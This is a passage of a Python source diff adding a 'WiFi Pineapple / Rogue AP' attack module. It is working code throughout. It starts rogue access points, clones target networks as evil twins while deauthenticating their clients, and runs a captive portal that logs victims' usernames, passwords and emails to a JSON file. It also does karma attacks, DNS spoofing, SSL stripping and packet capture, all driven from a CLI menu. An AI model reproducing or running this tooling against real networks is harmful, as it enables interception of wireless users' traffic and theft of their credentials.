'wpa=1', + 'wpa_key_mgmt=WPA-PSK', + f'wpa_passphrase={password}', + 'wpa_pairwise=TKIP', + ]) + + with open(hostapd_conf, 'w') as f: + f.write('\n'.join(conf_lines) + '\n') + + # Configure interface IP + ap_ip = '10.0.0.1' + ap_subnet = '10.0.0.0/24' + if self.ip_bin: + subprocess.run( + [self.ip_bin, 'addr', 'flush', 'dev', interface], + capture_output=True, timeout=5 + ) + subprocess.run( + [self.ip_bin, 'addr', 'add', f'{ap_ip}/24', 'dev', interface], + capture_output=True, timeout=5 + ) + subprocess.run( + [self.ip_bin, 'link', 'set', interface, 'up'], + capture_output=True, timeout=5 + ) + + # Build dnsmasq configuration + dnsmasq_conf = os.path.join(self.configs_dir, 'dnsmasq.conf') + dns_lines = [ + f'interface={interface}', + 
'bind-interfaces', + f'dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h', + f'dhcp-option=3,{ap_ip}', + f'dhcp-option=6,{ap_ip}', + f'server=8.8.8.8', + f'server=8.8.4.4', + 'log-queries', + f'log-facility={os.path.join(self.data_dir, "dnsmasq.log")}', + f'dhcp-leasefile={os.path.join(self.data_dir, "dnsmasq.leases")}', + ] + + # Add DNS spoofs if active + if self._dns_spoof_active and self._dns_spoofs: + for domain, ip in self._dns_spoofs.items(): + dns_lines.append(f'address=/{domain}/{ip}') + + with open(dnsmasq_conf, 'w') as f: + f.write('\n'.join(dns_lines) + '\n') + + # Set up NAT/forwarding if internet interface provided + if internet_interface: + self._setup_nat(interface, internet_interface, ap_subnet) + self._internet_interface = internet_interface + + # Start hostapd + self._hostapd_proc = subprocess.Popen( + [self.hostapd, hostapd_conf], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(1) + + # Check if hostapd started OK + if self._hostapd_proc.poll() is not None: + stderr = self._hostapd_proc.stderr.read().decode(errors='replace') + return {'ok': False, 'error': f'hostapd failed to start: {stderr[:300]}'} + + # Start dnsmasq + self._dnsmasq_proc = subprocess.Popen( + [self.dnsmasq, '-C', dnsmasq_conf, '-d'], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(0.5) + + if self._dnsmasq_proc.poll() is not None: + stderr = self._dnsmasq_proc.stderr.read().decode(errors='replace') + self._hostapd_proc.terminate() + return {'ok': False, 'error': f'dnsmasq failed to start: {stderr[:300]}'} + + self._ap_running = True + self._ap_ssid = ssid + self._ap_channel = channel + self._ap_interface = interface + + return { + 'ok': True, + 'message': f'Rogue AP "{ssid}" started on {interface} (ch {channel})', + 'ssid': ssid, + 'channel': channel, + 'interface': interface, + 'ip': ap_ip, + 'encryption': encryption, + 'nat': internet_interface is not None + } + + except Exception as e: + self.stop_rogue_ap() + return {'ok': False, 
'error': str(e)} + + def stop_rogue_ap(self) -> Dict: + """Stop rogue AP, kill hostapd/dnsmasq, cleanup.""" + errors = [] + + # Kill hostapd + if self._hostapd_proc: + try: + self._hostapd_proc.terminate() + self._hostapd_proc.wait(timeout=5) + except Exception: + try: + self._hostapd_proc.kill() + except Exception: + pass + self._hostapd_proc = None + + # Kill dnsmasq + if self._dnsmasq_proc: + try: + self._dnsmasq_proc.terminate() + self._dnsmasq_proc.wait(timeout=5) + except Exception: + try: + self._dnsmasq_proc.kill() + except Exception: + pass + self._dnsmasq_proc = None + + # Remove NAT rules + if self._internet_interface and self._ap_interface: + self._teardown_nat(self._ap_interface, self._internet_interface) + + # Stop captive portal if running + if self._portal_active: + self.stop_captive_portal() + + # Stop karma if running + if self._karma_active: + self.disable_karma() + + # Stop SSL strip if running + if self._sslstrip_active: + self.disable_ssl_strip() + + # Flush interface IP + if self.ip_bin and self._ap_interface: + try: + subprocess.run( + [self.ip_bin, 'addr', 'flush', 'dev', self._ap_interface], + capture_output=True, timeout=5 + ) + except Exception: + pass + + self._ap_running = False + self._ap_ssid = '' + self._ap_channel = 6 + self._ap_interface = '' + self._internet_interface = '' + self._clients.clear() + + return {'ok': True, 'message': 'Rogue AP stopped and cleaned up'} + + def is_running(self) -> bool: + """Check if AP is active.""" + if self._ap_running and self._hostapd_proc: + if self._hostapd_proc.poll() is not None: + self._ap_running = False + return self._ap_running + + def get_status(self) -> Dict: + """Get AP status details.""" + running = self.is_running() + return { + 'running': running, + 'ssid': self._ap_ssid if running else '', + 'channel': self._ap_channel if running else 0, + 'interface': self._ap_interface if running else '', + 'internet_interface': self._internet_interface if running else '', + 'client_count': 
len(self._clients) if running else 0, + 'portal_active': self._portal_active, + 'portal_type': self._portal_type, + 'karma_active': self._karma_active, + 'sslstrip_active': self._sslstrip_active, + 'dns_spoof_active': self._dns_spoof_active, + 'dns_spoofs': self._dns_spoofs if self._dns_spoof_active else {}, + 'capture_count': len(self._portal_captures), + 'tools': self.get_tools_status() + } + + # ── Evil Twin ──────────────────────────────────────────────────────── + + def evil_twin(self, target_ssid: str, target_bssid: str, interface: str, + internet_interface: str = None) -> Dict: + """Clone target AP config and start rogue AP with same parameters.""" + if self._ap_running: + return {'ok': False, 'error': 'AP already running. Stop it first.'} + if not target_ssid or not interface: + return {'ok': False, 'error': 'Target SSID and interface are required'} + + # Try to determine target channel + channel = 6 # default + if self.iw_bin: + try: + out = subprocess.check_output( + [self.iw_bin, 'dev', interface, 'scan'], + text=True, timeout=15, stderr=subprocess.DEVNULL + ) + # Parse scan output for the target BSSID/SSID + bss_block = '' + capture = False + for line in out.splitlines(): + if line.startswith('BSS '): + if capture and bss_block: + break + bssid_found = line.split()[1].split('(')[0].upper() + if target_bssid and bssid_found == target_bssid.upper(): + capture = True + bss_block = '' + else: + capture = False + if capture: + bss_block += line + '\n' + + if bss_block: + ch_m = re.search(r'DS Parameter set: channel (\d+)', bss_block) + if ch_m: + channel = int(ch_m.group(1)) + else: + ch_m = re.search(r'primary channel: (\d+)', bss_block) + if ch_m: + channel = int(ch_m.group(1)) + except Exception: + pass + + # Optionally deauth clients from real AP + if target_bssid and self.aireplay: + try: + subprocess.Popen( + [self.aireplay, '-0', '5', '-a', target_bssid, interface], + stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL + ) + except Exception: + pass 
# Non-fatal: deauth is optional + + # Start AP with cloned params + result = self.start_rogue_ap( + ssid=target_ssid, + interface=interface, + channel=channel, + encryption='open', + internet_interface=internet_interface + ) + + if result.get('ok'): + result['message'] = ( + f'Evil twin for "{target_ssid}" started on ch {channel}' + + (f' (cloned from {target_bssid})' if target_bssid else '') + ) + result['evil_twin'] = True + result['target_bssid'] = target_bssid + + return result + + # ── Captive Portal ─────────────────────────────────────────────────── + + def start_captive_portal(self, portal_type: str = 'hotel_wifi', + custom_html: str = None) -> Dict: + """Set up iptables to redirect HTTP to captive portal.""" + if not self._ap_running: + return {'ok': False, 'error': 'Start rogue AP first before enabling captive portal'} + if not self.iptables: + return {'ok': False, 'error': 'iptables not found'} + + ap_ip = '10.0.0.1' + + try: + # Redirect HTTP (port 80) to our portal server + subprocess.run([ + self.iptables, '-t', 'nat', '-A', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '80', + '-j', 'DNAT', '--to-destination', f'{ap_ip}:8080' + ], capture_output=True, timeout=5) + + # Redirect HTTPS (port 443) to portal as well + subprocess.run([ + self.iptables, '-t', 'nat', '-A', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '443', + '-j', 'DNAT', '--to-destination', f'{ap_ip}:8080' + ], capture_output=True, timeout=5) + + # Allow the redirect + subprocess.run([ + self.iptables, '-A', 'FORWARD', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '8080', + '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + + self._portal_active = True + self._portal_type = portal_type + + # Save portal HTML for serving + if custom_html: + portal_html = custom_html + else: + portal_html = CAPTIVE_PORTAL_TEMPLATES.get(portal_type, '') + if not portal_html: + portal_html = CAPTIVE_PORTAL_TEMPLATES.get('hotel_wifi', '') + + portal_file = 
os.path.join(self.configs_dir, 'portal.html') + with open(portal_file, 'w') as f: + f.write(portal_html) + + success_file = os.path.join(self.configs_dir, 'portal_success.html') + with open(success_file, 'w') as f: + f.write(PORTAL_SUCCESS_PAGE) + + return { + 'ok': True, + 'message': f'Captive portal ({portal_type}) enabled', + 'portal_type': portal_type, + 'redirect_ip': ap_ip + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + def stop_captive_portal(self) -> Dict: + """Remove captive portal iptables redirect rules.""" + if not self._portal_active: + return {'ok': False, 'error': 'No captive portal is running'} + + ap_ip = '10.0.0.1' + + try: + if self.iptables and self._ap_interface: + # Remove HTTP redirect + subprocess.run([ + self.iptables, '-t', 'nat', '-D', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '80', + '-j', 'DNAT', '--to-destination', f'{ap_ip}:8080' + ], capture_output=True, timeout=5) + + # Remove HTTPS redirect + subprocess.run([ + self.iptables, '-t', 'nat', '-D', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '443', + '-j', 'DNAT', '--to-destination', f'{ap_ip}:8080' + ], capture_output=True, timeout=5) + + # Remove forward rule + subprocess.run([ + self.iptables, '-D', 'FORWARD', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '8080', + '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + + except Exception: + pass + + self._portal_active = False + self._portal_type = '' + return {'ok': True, 'message': 'Captive portal stopped'} + + def capture_portal_creds(self, data: Dict) -> Dict: + """Log credentials from portal form submission.""" + entry = { + 'timestamp': datetime.now().isoformat(), + 'username': data.get('username', ''), + 'password': data.get('password', ''), + 'email': data.get('email', ''), + 'domain': data.get('domain', ''), + 'provider': data.get('provider', ''), + 'ip': data.get('ip', ''), + 'user_agent': data.get('user_agent', ''), + } + + with self._lock: + 
self._portal_captures.append(entry) + self._save_captures() + + return {'ok': True, 'count': len(self._portal_captures)} + + def get_portal_captures(self) -> List[Dict]: + """Return all captured portal credentials.""" + return list(self._portal_captures) + + def get_portal_html(self) -> str: + """Return the current portal HTML page.""" + portal_file = os.path.join(self.configs_dir, 'portal.html') + if os.path.exists(portal_file): + with open(portal_file, 'r') as f: + return f.read() + # Default fallback + return CAPTIVE_PORTAL_TEMPLATES.get('hotel_wifi', 'Portal') + + def get_portal_success_html(self) -> str: + """Return the portal success page HTML.""" + success_file = os.path.join(self.configs_dir, 'portal_success.html') + if os.path.exists(success_file): + with open(success_file, 'r') as f: + return f.read() + return PORTAL_SUCCESS_PAGE + + # ── Karma Attack ───────────────────────────────────────────────────── + + def enable_karma(self, interface: str = None) -> Dict: + """Enable karma mode: respond to all probe requests.""" + iface = interface or self._ap_interface + if not iface: + return {'ok': False, 'error': 'No interface specified'} + if self._karma_active: + return {'ok': False, 'error': 'Karma mode is already active'} + + # Prefer hostapd-mana if available + hostapd_mana = find_tool('hostapd-mana') or shutil.which('hostapd-mana') + + if hostapd_mana: + # Generate karma-enabled hostapd-mana config + karma_conf = os.path.join(self.configs_dir, 'karma.conf') + conf_lines = [ + f'interface={iface}', + 'ssid=FreeWiFi', + 'channel=6', + 'driver=nl80211', + 'hw_mode=g', + 'enable_karma=1', + 'karma_black_white=0', + ] + with open(karma_conf, 'w') as f: + f.write('\n'.join(conf_lines) + '\n') + + try: + self._karma_proc = subprocess.Popen( + [hostapd_mana, karma_conf], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(1) + if self._karma_proc.poll() is not None: + stderr = self._karma_proc.stderr.read().decode(errors='replace') + return {'ok': 
False, 'error': f'hostapd-mana failed: {stderr[:200]}'} + + self._karma_active = True + return {'ok': True, 'message': 'Karma mode enabled via hostapd-mana'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + # Fallback: airbase-ng for karma + elif self.airbase: + try: + self._karma_proc = subprocess.Popen( + [self.airbase, '-P', '-C', '30', '-e', 'FreeWiFi', '-v', iface], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(1) + if self._karma_proc.poll() is not None: + stderr = self._karma_proc.stderr.read().decode(errors='replace') + return {'ok': False, 'error': f'airbase-ng failed: {stderr[:200]}'} + + self._karma_active = True + return {'ok': True, 'message': 'Karma mode enabled via airbase-ng'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + return {'ok': False, 'error': 'Neither hostapd-mana nor airbase-ng found'} + + def disable_karma(self) -> Dict: + """Stop karma mode.""" + if not self._karma_active: + return {'ok': False, 'error': 'Karma mode is not active'} + + if self._karma_proc: + try: + self._karma_proc.terminate() + self._karma_proc.wait(timeout=5) + except Exception: + try: + self._karma_proc.kill() + except Exception: + pass + self._karma_proc = None + + self._karma_active = False + return {'ok': True, 'message': 'Karma mode disabled'} + + # ── Client Management ──────────────────────────────────────────────── + + def get_clients(self) -> List[Dict]: + """List connected clients from DHCP leases and ARP table.""" + clients = {} + + # Parse dnsmasq lease file + lease_file = os.path.join(self.data_dir, 'dnsmasq.leases') + if os.path.exists(lease_file): + try: + with open(lease_file, 'r') as f: + for line in f: + parts = line.strip().split() + if len(parts) >= 4: + mac = parts[1].upper() + ip = parts[2] + hostname = parts[3] if parts[3] != '*' else '' + clients[mac] = { + 'mac': mac, + 'ip': ip, + 'hostname': hostname, + 'os': self._fingerprint_os(hostname, mac), + 'first_seen': 
self._clients.get(mac, {}).get( + 'first_seen', datetime.now().isoformat()), + 'last_seen': datetime.now().isoformat(), + 'data_usage': self._clients.get(mac, {}).get('data_usage', 0) + } + except Exception: + pass + + # Supplement with ARP table + try: + arp_output = subprocess.check_output( + ['arp', '-an'], text=True, timeout=5, stderr=subprocess.DEVNULL + ) + for line in arp_output.splitlines(): + m = re.match(r'\S+\s+\((\d+\.\d+\.\d+\.\d+)\)\s+at\s+([0-9a-fA-F:]+)', line) + if m: + ip = m.group(1) + mac = m.group(2).upper() + if ip.startswith('10.0.0.') and mac not in clients: + clients[mac] = { + 'mac': mac, + 'ip': ip, + 'hostname': '', + 'os': '', + 'first_seen': self._clients.get(mac, {}).get( + 'first_seen', datetime.now().isoformat()), + 'last_seen': datetime.now().isoformat(), + 'data_usage': self._clients.get(mac, {}).get('data_usage', 0) + } + except Exception: + pass + + with self._lock: + self._clients.update(clients) + + return list(self._clients.values()) + + def kick_client(self, mac_address: str) -> Dict: + """Deauthenticate specific client from rogue AP.""" + if not self._ap_running: + return {'ok': False, 'error': 'AP is not running'} + if not mac_address: + return {'ok': False, 'error': 'MAC address is required'} + + mac = mac_address.upper() + + # Use aireplay-ng to send deauth + if self.aireplay and self._ap_interface: + try: + # Get the AP BSSID from interface + ap_mac = self._get_interface_mac(self._ap_interface) + if not ap_mac: + ap_mac = 'FF:FF:FF:FF:FF:FF' + + subprocess.run( + [self.aireplay, '-0', '3', '-a', ap_mac, '-c', mac, self._ap_interface], + capture_output=True, timeout=10 + ) + + # Remove from client list + if mac in self._clients: + del self._clients[mac] + + return {'ok': True, 'message': f'Deauth sent to {mac}'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + # Fallback: use hostapd_cli + hostapd_cli = shutil.which('hostapd_cli') + if hostapd_cli: + try: + subprocess.run( + [hostapd_cli, 
'deauthenticate', mac], + capture_output=True, timeout=5 + ) + if mac in self._clients: + del self._clients[mac] + return {'ok': True, 'message': f'Client {mac} deauthenticated'} + except Exception as e: + return {'ok': False, 'error': str(e)} + + return {'ok': False, 'error': 'No tool available to kick client'} + + # ── DNS Spoofing ───────────────────────────────────────────────────── + + def enable_dns_spoof(self, spoofs: Dict[str, str]) -> Dict: + """Configure dnsmasq to resolve specific domains to specified IPs.""" + if not spoofs: + return {'ok': False, 'error': 'No spoofs provided'} + + self._dns_spoofs = dict(spoofs) + self._dns_spoof_active = True + + # If AP is running, restart dnsmasq with new config + if self._ap_running: + return self._restart_dnsmasq() + + return { + 'ok': True, + 'message': f'DNS spoofing configured for {len(spoofs)} domain(s). ' + 'Spoofs will activate when AP starts.', + 'spoofs': spoofs + } + + def disable_dns_spoof(self) -> Dict: + """Restore normal DNS resolution.""" + self._dns_spoofs.clear() + self._dns_spoof_active = False + + if self._ap_running: + return self._restart_dnsmasq() + + return {'ok': True, 'message': 'DNS spoofing disabled'} + + # ── SSL Strip ──────────────────────────────────────────────────────── + + def enable_ssl_strip(self) -> Dict: + """Set up iptables + sslstrip to downgrade HTTPS connections.""" + if not self._ap_running: + return {'ok': False, 'error': 'Start rogue AP first'} + if self._sslstrip_active: + return {'ok': False, 'error': 'SSL strip is already running'} + if not self.sslstrip_bin: + return {'ok': False, 'error': 'sslstrip not found. 
Install with: pip install sslstrip'} + if not self.iptables: + return {'ok': False, 'error': 'iptables not found'} + + sslstrip_port = 10000 + + try: + # Enable IP forwarding + subprocess.run( + ['sysctl', '-w', 'net.ipv4.ip_forward=1'], + capture_output=True, timeout=5 + ) + + # Redirect HTTPS traffic to sslstrip + subprocess.run([ + self.iptables, '-t', 'nat', '-A', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '443', + '-j', 'REDIRECT', '--to-port', str(sslstrip_port) + ], capture_output=True, timeout=5) + + # Start sslstrip + log_file = os.path.join(self.data_dir, 'sslstrip.log') + self._sslstrip_proc = subprocess.Popen( + [self.sslstrip_bin, '-l', str(sslstrip_port), '-w', log_file], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(1) + + if self._sslstrip_proc.poll() is not None: + stderr = self._sslstrip_proc.stderr.read().decode(errors='replace') + return {'ok': False, 'error': f'sslstrip failed: {stderr[:200]}'} + + self._sslstrip_active = True + return {'ok': True, 'message': f'SSL strip enabled on port {sslstrip_port}'} + + except Exception as e: + return {'ok': False, 'error': str(e)} + + def disable_ssl_strip(self) -> Dict: + """Remove sslstrip iptables rules and stop sslstrip.""" + if not self._sslstrip_active: + return {'ok': False, 'error': 'SSL strip is not running'} + + sslstrip_port = 10000 + + # Kill sslstrip + if self._sslstrip_proc: + try: + self._sslstrip_proc.terminate() + self._sslstrip_proc.wait(timeout=5) + except Exception: + try: + self._sslstrip_proc.kill() + except Exception: + pass + self._sslstrip_proc = None + + # Remove iptables rule + if self.iptables and self._ap_interface: + try: + subprocess.run([ + self.iptables, '-t', 'nat', '-D', 'PREROUTING', + '-i', self._ap_interface, '-p', 'tcp', '--dport', '443', + '-j', 'REDIRECT', '--to-port', str(sslstrip_port) + ], capture_output=True, timeout=5) + except Exception: + pass + + self._sslstrip_active = False + return {'ok': True, 'message': 'SSL 
strip disabled'} + + # ── Traffic Capture ────────────────────────────────────────────────── + + def sniff_traffic(self, interface: str = None, filter_expr: str = None, + duration: int = 60) -> Dict: + """Capture packets from connected clients.""" + iface = interface or self._ap_interface + if not iface: + return {'ok': False, 'error': 'No interface specified'} + if not self.tcpdump: + return {'ok': False, 'error': 'tcpdump not found'} + if self._sniff_proc and self._sniff_proc.poll() is None: + return {'ok': False, 'error': 'Capture already running. Stop it first.'} + + cap_file = os.path.join( + self.traffic_dir, f'traffic_{int(time.time())}.pcap' + ) + + cmd = [self.tcpdump, '-i', iface, '-w', cap_file, '-c', '10000'] + if filter_expr: + cmd.extend(filter_expr.split()) + + try: + self._sniff_proc = subprocess.Popen( + cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + + # Schedule auto-stop + def _auto_stop(): + time.sleep(duration) + if self._sniff_proc and self._sniff_proc.poll() is None: + try: + self._sniff_proc.send_signal(signal.SIGINT) + self._sniff_proc.wait(timeout=5) + except Exception: + pass + + threading.Thread(target=_auto_stop, daemon=True).start() + + return { + 'ok': True, + 'message': f'Traffic capture started on {iface} ({duration}s)', + 'capture_file': cap_file, + 'pid': self._sniff_proc.pid + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + def stop_sniff(self) -> Dict: + """Stop traffic capture.""" + if self._sniff_proc and self._sniff_proc.poll() is None: + try: + self._sniff_proc.send_signal(signal.SIGINT) + self._sniff_proc.wait(timeout=5) + except Exception: + try: + self._sniff_proc.kill() + except Exception: + pass + self._sniff_proc = None + return {'ok': True, 'message': 'Traffic capture stopped'} + return {'ok': False, 'error': 'No capture running'} + + def get_traffic_stats(self) -> Dict: + """Get bandwidth usage, top domains, top clients.""" + stats = { + 'total_bytes': 0, + 'top_domains': [], + 
'top_clients': [], + 'capture_files': [] + } + + # Parse dnsmasq query log for top domains + log_file = os.path.join(self.data_dir, 'dnsmasq.log') + domain_counts: Dict[str, int] = {} + if os.path.exists(log_file): + try: + with open(log_file, 'r') as f: + for line in f: + m = re.search(r'query\[A\]\s+(\S+)\s+from\s+(\S+)', line) + if m: + domain = m.group(1) + client_ip = m.group(2) + domain_counts[domain] = domain_counts.get(domain, 0) + 1 + except Exception: + pass + + stats['top_domains'] = sorted( + [{'domain': k, 'queries': v} for k, v in domain_counts.items()], + key=lambda x: x['queries'], reverse=True + )[:20] + + # Client data from leases + client_usage = {} + for mac, info in self._clients.items(): + client_usage[mac] = { + 'mac': mac, + 'ip': info.get('ip', ''), + 'hostname': info.get('hostname', ''), + 'data_usage': info.get('data_usage', 0) + } + + stats['top_clients'] = sorted( + list(client_usage.values()), + key=lambda x: x['data_usage'], reverse=True + )[:20] + + # List traffic capture files + try: + traffic_path = Path(self.traffic_dir) + for f in sorted(traffic_path.glob('*.pcap'), reverse=True): + stats['capture_files'].append({ + 'name': f.name, + 'path': str(f), + 'size': f.stat().st_size, + 'modified': datetime.fromtimestamp(f.stat().st_mtime).isoformat() + }) + except Exception: + pass + + return stats + + # ── NAT / iptables Helpers ─────────────────────────────────────────── + + def _setup_nat(self, ap_iface: str, inet_iface: str, subnet: str): + """Set up NAT forwarding between AP and internet interface.""" + if not self.iptables: + return + + try: + # Enable IP forwarding + subprocess.run( + ['sysctl', '-w', 'net.ipv4.ip_forward=1'], + capture_output=True, timeout=5 + ) + + # NAT masquerade + subprocess.run([ + self.iptables, '-t', 'nat', '-A', 'POSTROUTING', + '-o', inet_iface, '-j', 'MASQUERADE' + ], capture_output=True, timeout=5) + + # Allow forwarding + subprocess.run([ + self.iptables, '-A', 'FORWARD', + '-i', ap_iface, '-o', 
inet_iface, '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + + subprocess.run([ + self.iptables, '-A', 'FORWARD', + '-i', inet_iface, '-o', ap_iface, + '-m', 'state', '--state', 'RELATED,ESTABLISHED', + '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + + except Exception: + pass + + def _teardown_nat(self, ap_iface: str, inet_iface: str): + """Remove NAT forwarding rules.""" + if not self.iptables: + return + + try: + subprocess.run([ + self.iptables, '-t', 'nat', '-D', 'POSTROUTING', + '-o', inet_iface, '-j', 'MASQUERADE' + ], capture_output=True, timeout=5) + + subprocess.run([ + self.iptables, '-D', 'FORWARD', + '-i', ap_iface, '-o', inet_iface, '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + + subprocess.run([ + self.iptables, '-D', 'FORWARD', + '-i', inet_iface, '-o', ap_iface, + '-m', 'state', '--state', 'RELATED,ESTABLISHED', + '-j', 'ACCEPT' + ], capture_output=True, timeout=5) + except Exception: + pass + + def _restart_dnsmasq(self) -> Dict: + """Restart dnsmasq with current configuration (including DNS spoofs).""" + if self._dnsmasq_proc: + try: + self._dnsmasq_proc.terminate() + self._dnsmasq_proc.wait(timeout=5) + except Exception: + try: + self._dnsmasq_proc.kill() + except Exception: + pass + + ap_ip = '10.0.0.1' + dnsmasq_conf = os.path.join(self.configs_dir, 'dnsmasq.conf') + dns_lines = [ + f'interface={self._ap_interface}', + 'bind-interfaces', + f'dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h', + f'dhcp-option=3,{ap_ip}', + f'dhcp-option=6,{ap_ip}', + 'server=8.8.8.8', + 'server=8.8.4.4', + 'log-queries', + f'log-facility={os.path.join(self.data_dir, "dnsmasq.log")}', + f'dhcp-leasefile={os.path.join(self.data_dir, "dnsmasq.leases")}', + ] + + if self._dns_spoof_active and self._dns_spoofs: + for domain, ip in self._dns_spoofs.items(): + dns_lines.append(f'address=/{domain}/{ip}') + + with open(dnsmasq_conf, 'w') as f: + f.write('\n'.join(dns_lines) + '\n') + + try: + self._dnsmasq_proc = subprocess.Popen( + [self.dnsmasq, 
'-C', dnsmasq_conf, '-d'], + stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + time.sleep(0.5) + if self._dnsmasq_proc.poll() is not None: + stderr = self._dnsmasq_proc.stderr.read().decode(errors='replace') + return {'ok': False, 'error': f'dnsmasq restart failed: {stderr[:200]}'} + + msg = 'dnsmasq restarted' + if self._dns_spoof_active: + msg += f' with {len(self._dns_spoofs)} DNS spoof(s)' + return {'ok': True, 'message': msg} + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Internal Helpers ───────────────────────────────────────────────── + + def _get_interface_mac(self, interface: str) -> str: + """Get MAC address of an interface.""" + try: + mac_file = Path(f'/sys/class/net/{interface}/address') + if mac_file.exists(): + return mac_file.read_text().strip().upper() + except Exception: + pass + + if self.ip_bin: + try: + out = subprocess.check_output( + [self.ip_bin, 'link', 'show', interface], + text=True, timeout=5 + ) + m = re.search(r'link/ether\s+([0-9a-fA-F:]+)', out) + if m: + return m.group(1).upper() + except Exception: + pass + return '' + + def _fingerprint_os(self, hostname: str, mac: str) -> str: + """Basic OS fingerprinting from hostname and MAC OUI.""" + hostname_lower = hostname.lower() if hostname else '' + + if 'iphone' in hostname_lower or 'ipad' in hostname_lower: + return 'iOS' + if 'android' in hostname_lower or 'galaxy' in hostname_lower or 'pixel' in hostname_lower: + return 'Android' + if 'macbook' in hostname_lower or 'imac' in hostname_lower: + return 'macOS' + if hostname_lower.startswith('desktop-') or hostname_lower.startswith('laptop-'): + return 'Windows' + + # OUI-based fingerprinting + oui = mac[:8].upper() if mac else '' + apple_ouis = [ + '00:03:93', '00:05:02', '00:0A:27', '00:0A:95', '00:0D:93', + '00:10:FA', '00:11:24', '00:14:51', '00:16:CB', '00:17:F2', + '00:19:E3', '00:1B:63', '00:1C:B3', '00:1D:4F', '00:1E:52', + '00:1E:C2', '00:1F:5B', '00:1F:F3', '00:21:E9', '00:22:41', + '00:23:12', 
'00:23:32', '00:23:6C', '00:23:DF', '00:24:36', + '00:25:00', '00:25:4B', '00:25:BC', '00:26:08', '00:26:4A', + '00:26:B0', '00:26:BB', '3C:07:54', '7C:D1:C3', 'A4:83:E7', + 'AC:BC:32', 'B8:53:AC', 'D0:E1:40', 'F0:B4:79', 'F4:5C:89', + ] + if oui in apple_ouis: + return 'Apple' + + samsung_ouis = ['00:07:AB', '00:12:47', '00:15:99', '00:16:32', '00:17:D5', + '00:18:AF', '00:1A:8A', '00:1B:98', '00:1C:43', '00:1D:25', + '00:1E:E1', '00:1E:E2', '00:21:19', '00:21:D1', '00:23:39', + '00:23:99', '00:23:D6', '00:23:D7', '00:24:54', '00:24:90', + '00:24:91', '00:25:66', '00:25:67', '00:26:37', '00:26:5D'] + if oui in samsung_ouis: + return 'Android (Samsung)' + + return '' + + def _save_captures(self): + """Persist captured credentials to disk.""" + cap_file = os.path.join(self.data_dir, 'portal_captures.json') + try: + with open(cap_file, 'w') as f: + json.dump(self._portal_captures, f, indent=2) + except Exception: + pass + + def _load_captures(self): + """Load persisted captures from disk.""" + cap_file = os.path.join(self.data_dir, 'portal_captures.json') + if os.path.exists(cap_file): + try: + with open(cap_file, 'r') as f: + self._portal_captures = json.load(f) + except Exception: + self._portal_captures = [] + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_pineapple() -> PineappleAP: + global _instance + if _instance is None: + _instance = PineappleAP() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for WiFi Pineapple / Rogue AP module.""" + ap = get_pineapple() + + while True: + status = ap.get_status() + tools = ap.get_tools_status() + available = sum(1 for v in tools.values() if v) + + print(f"\n{'='*60}") + print(f" WiFi Pineapple / Rogue AP ({available}/{len(tools)} tools)") + print(f"{'='*60}") + if status['running']: + print(f" AP Status: RUNNING") + print(f" SSID: {status['ssid']} Channel: 
{status['channel']}") + print(f" Interface: {status['interface']}") + print(f" Clients: {status['client_count']}") + if status['portal_active']: + print(f" Portal: {status['portal_type']}") + if status['karma_active']: + print(f" Karma: ACTIVE") + if status['dns_spoof_active']: + print(f" DNS Spoofs: {len(status['dns_spoofs'])} entries") + else: + print(f" AP Status: STOPPED") + print() + print(" 1 — Start Rogue AP") + print(" 2 — Stop Rogue AP") + print(" 3 — Evil Twin Attack") + print(" 4 — Captive Portal") + print(" 5 — View Clients") + print(" 6 — DNS Spoof") + print(" 7 — Karma Attack") + print(" 8 — SSL Strip") + print(" 9 — View Captures") + print(" 10 — Traffic Stats") + print(" 11 — Tool Status") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + + elif choice == '1': + ifaces = ap.get_interfaces() + wireless = [i for i in ifaces if i.get('wireless', True)] + if wireless: + print(" Wireless interfaces:") + for i, ifc in enumerate(wireless): + print(f" {i+1}. 
